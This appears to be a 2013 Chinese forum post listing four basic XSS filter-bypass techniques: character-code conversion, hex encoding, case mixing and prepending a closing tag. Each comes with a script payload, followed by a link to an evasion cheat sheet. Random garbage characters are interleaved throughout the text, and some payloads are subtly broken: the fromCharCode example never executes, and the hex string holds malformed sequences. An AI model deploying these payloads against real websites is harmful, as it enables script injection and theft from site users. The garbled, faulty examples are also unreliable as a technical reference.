四种超级基础的绕过方法。& T" T' H' l; Y+ U( C
1.转换为ASCII码
7 Z7 c$ t! p& S4 v例子:原脚本为<script>alert(‘I love F4ck’)</script >" k- w1 u+ P' Y( B( _. Y+ O% I$ ~' S
通过转换,变成:
0 s& D# v8 y6 I9 p/ M3 b<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>, i( i) [- b+ @0 O V( c! e7 @
9 v7 K- b2 `/ }/ h% _# [9 ~2 A2.转换为HEX(十六进制)
: m+ M3 v/ ] |7 \% F. w% i例子:原脚本为<script>alert(‘I love F4ck’)</script>* Q* i4 O* a, s
通过转换,变成:4 w% B; |: L6 b/ p$ b D
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
X4 I, Y3 w! a- h: G
4 L' D/ v: `3 s* p3 _+ k3 H3.转换脚本的大小写
: s) a7 f) y% K/ K9 s! P例子:原脚本为<script>alert(‘I love F4ck’)</script>
" Q5 d' k. u* f转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>" T# k# j3 Y- G# B3 E
5 X3 t% x# {7 g# b! z+ ]4.增加闭合标记”>5 Q" b" a+ Q( `! ~) Q$ n
例子:原脚本为<script>alert(‘I love F4ck’)</script>
. g6 V3 }. y& i( h; _& J2 J转换为:”><script>alert(‘I love F4ck’)</script>! S: b2 E4 G: r8 Z. r
更详细绕过技术请参考此网页
4 V: G. M# e6 l$ R* ?https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet/ Y& p! A4 G9 t$ v/ N3 j
% `* }1 I# ]& p2 f, x转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对